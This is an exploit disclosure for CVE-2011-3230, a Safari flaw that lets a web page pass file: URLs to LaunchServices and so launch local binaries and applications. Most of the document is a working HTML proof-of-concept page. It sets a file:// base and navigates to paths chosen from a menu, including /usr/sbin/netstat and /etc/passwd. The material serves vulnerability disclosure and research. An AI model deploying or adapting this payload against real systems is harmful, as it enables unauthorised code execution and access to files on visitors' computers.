Apple Safari Arbitrary Code Execution

`CVE: CVE-2011-3230  
Found By: Aaron Sigel of vtty.com  
  
There's not a ton to say about this bug aside from "Yikes"! I think the PoC speaks for itself. This allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page. The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it. Other than that, you can run or launch anything you can access by using the method in the html provided below.  
  
  
  
  
<html>  
<head>  
<base href="file://">  
<script>  
function DoIt() {  
alert(document.getElementById("cmdToRun").value);  
document.location=document.getElementById("cmdToRun").value;  
}  
</script>  
</head>  
<body>  
<select id="cmdToRun">  
<option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>  
<option value="/etc/passwd">Launch /etc/passwd</option>  
<option value="/Applications/Utilities/Bluetooth File Exchange.app">  
Launch Bluetooth File Exchange.app</option>  
</select>  
<br />  
<input type=button value="Launch" onclick="DoIt()">  
<br />  
</body>  
</html>  
  
  
Apple's advisory: http://support.apple.com/kb/HT5000  
`